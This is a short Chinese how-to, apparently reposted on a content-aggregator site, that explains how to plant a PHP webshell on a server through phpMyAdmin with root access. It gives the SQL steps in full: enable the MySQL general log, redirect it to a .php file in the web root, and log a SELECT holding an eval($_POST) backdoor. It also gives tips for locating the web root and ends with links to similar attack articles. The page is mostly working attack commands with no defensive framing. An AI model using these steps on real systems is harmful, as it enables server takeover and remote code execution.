phpMyadmin日志写入webshell

Posted Paper_airplane

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了phpMyadmin日志写入webshell相关的知识,希望对你有一定的参考价值。

前提

1.可登录phpmyadmin
2.root权限
3.知道网站绝对路径

步骤

1.查看日志是否开启

show variables like \'%general%\';

2.开启日志记录

SET GLOBAL general_log=\'on\';

3.修复日志文件路径

set global general_log_file=\'D:\\\\phpStudy\\\\WWW\\\\shell.php\';

4.写入webshell

select "<?php eval($_POST[\'gg\']);?>";

网站路径判断

如果是Windows,判断是不是phpStudy集成环境,可通过mysql的位置尝试定位网站位置(使用sql语句定位mysql位置:select @@datadir;)
如果是Linux,一般实在/var/www/html路径下

以上是关于phpMyadmin日志写入webshell的主要内容,如果未能解决你的问题,请参考以下文章

利用mysql数据库日志文件获得webshell

PhpMyadmin利用Mysql root密码获取webshell

通过phpMyAdmin拿webshell

webshell检测——使用auditd进行system调用审计

墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)

墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)